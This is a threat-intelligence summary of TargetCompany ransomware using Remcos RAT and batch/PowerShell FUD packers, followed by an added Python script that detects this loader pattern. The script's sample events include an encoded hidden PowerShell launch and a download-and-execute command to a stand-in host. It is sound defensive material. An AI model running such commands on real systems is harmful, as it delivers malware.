TargetCompany Ransomware Layers Intrusions with Remcos
Category: Ransomware News | Industry: Global | Source: Trend Micro
Ransomware operators from TargetCompany are employing fully undetectable (FUD) packers as part of their intrusion strategy, alongside the Remcos remote access trojan (RAT), in an effort to execute evasive infections. This attack chain was examined by threat analysts Don Ovid Ladores and Nathaniel Morales from Trend Micro, who reviewed malware samples and studied a live infection chain targeting a victim organization. For initial access, the threat actors continued their pattern of targeting vulnerable SQL servers. Once they established a foothold, the attackers executed a PowerShell script to download various executable files into the TEMP directory. Several of these download attempts failed; one batch file, however, successfully facilitated the download and installation of the Remcos RAT.
"The FUD packer used by Remcos and the one used by the TargetCompany ransomware has a style of packaging that closely resembles the style used by BatCloak: Using a batch file as an outer layer and afterward, decoding and loading using PowerShell to make a LOLBins execution," the Trend Micro researchers explain. Metasploit also played a role in various TargetCompany infection routines, being used to create a new account and execute tools such as GMER, IObit Unlocker, and PowerTool/PowTool.
Trend Micro warns about the adoption of the 'cmd x PowerShell' loader as a potent attack technique, a trend that TargetCompany has embraced since February 2022, and attributes the start of this trend to OneNote campaigns that used PowerLoad together with an accompanying CMDFile. Unlike other malware such as AsyncRAT, which incorporates both decompression and decryption techniques, the CMDFiles used by the loaders associated with Remcos and TargetCompany integrate only decompression into the routine of their binaries. TargetCompany and its Remcos loaders likely modify the overall appearance or structure of the payload, presumably to evade detection.
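The traits described above (a batch file or cmd.exe as the outer layer, PowerShell doing the decoding and loading, and executables pulled into the TEMP directory) are visible in ordinary process-creation telemetry. The following triage script is an added example written for this summary; it is not code from Trend Micro or from the report. It assumes Sysmon-style events reduced to three fields (parent image, image, command line), the sample events, paths, URL and base64 string are constructed rather than real indicators, and the two-trait alert threshold is an assumption chosen so that a lone cmd.exe-to-PowerShell launch, which is routine in administrative scripting, does not alert on its own.

```python
"""Triage helper for the 'cmd x PowerShell' loader pattern.

Added example (not Trend Micro's or the report's code). Scans Sysmon-style
process-creation events for: cmd.exe spawning PowerShell, PowerShell decoding
a payload or hiding its window, executables referenced under TEMP, and
in-script download primitives. All sample values below are constructed.
"""
import re
from dataclasses import dataclass
from typing import List, Tuple


@dataclass
class ProcEvent:
    parent_image: str   # image of the creating process, e.g. ...\cmd.exe
    image: str          # image of the created process
    command_line: str


# Decoding/evasion switches: -e/-enc/-EncodedCommand followed by a base64
# blob, FromBase64String, a hidden window, or Invoke-Expression/iex.
DECODE_RE = re.compile(
    r"(?i)(?:-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}"
    r"|FromBase64String|-w(?:indowstyle)?\s+hidden|Invoke-Expression|\biex\b)"
)
# An .exe/.dll/.bat referenced under the user's TEMP directory.
TEMP_EXE_RE = re.compile(
    r"(?i)(?:%temp%|\$env:temp|\\appdata\\local\\temp)\\[^\s'\"]*\.(?:exe|dll|bat)\b"
)
# Common in-script download primitives.
DOWNLOAD_RE = re.compile(
    r"(?i)(?:DownloadFile|DownloadString|DownloadData|Invoke-WebRequest|\biwr\b"
    r"|Start-BitsTransfer|Net\.WebClient)"
)


def score_event(ev: ProcEvent) -> List[str]:
    """Return the loader traits an event exhibits (empty list if none)."""
    reasons = []
    if ev.parent_image.lower().endswith("cmd.exe") and ev.image.lower().endswith("powershell.exe"):
        reasons.append("cmd-launched-powershell")
    if DECODE_RE.search(ev.command_line):
        reasons.append("decode-or-hidden")
    if TEMP_EXE_RE.search(ev.command_line):
        reasons.append("temp-executable")
    if DOWNLOAD_RE.search(ev.command_line):
        reasons.append("download")
    return reasons


def detect(events: List[ProcEvent], min_reasons: int = 2) -> List[Tuple[int, List[str]]]:
    """Flag events showing at least min_reasons traits (threshold is an assumption)."""
    hits = []
    for idx, ev in enumerate(events):
        reasons = score_event(ev)
        if len(reasons) >= min_reasons:
            hits.append((idx, reasons))
    return hits


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed sample events: hypothetical paths, URL and base64, not IoCs.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", PS,
              r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", PS,
              "powershell.exe -w hidden -nop -enc QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVo="),
    ProcEvent(r"C:\Windows\System32\cmd.exe", PS,
              "powershell.exe -c \"(New-Object Net.WebClient).DownloadFile("
              "'http://example.invalid/a.exe','%TEMP%\\a.exe'); Start-Process '%TEMP%\\a.exe'\""),
    ProcEvent(r"C:\Windows\System32\cmd.exe", PS,
              r"powershell.exe -File C:\ProgramData\Scripts\inventory.ps1"),
    ProcEvent(r"C:\Windows\System32\services.exe", PS,
              "powershell.exe -c Get-Service"),
]


if __name__ == "__main__":
    for idx, reasons in detect(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(reasons)}")
        print(f"  {SAMPLE_EVENTS[idx].command_line}")
```

Run stand-alone, the script flags the hidden-window encoded launch and the TEMP download-and-execute event while leaving the plain `-File` launch from cmd.exe unflagged; lowering `min_reasons` to 1 would surface that one too, which is the trade-off to weigh against how much administrative scripting an environment runs through batch files.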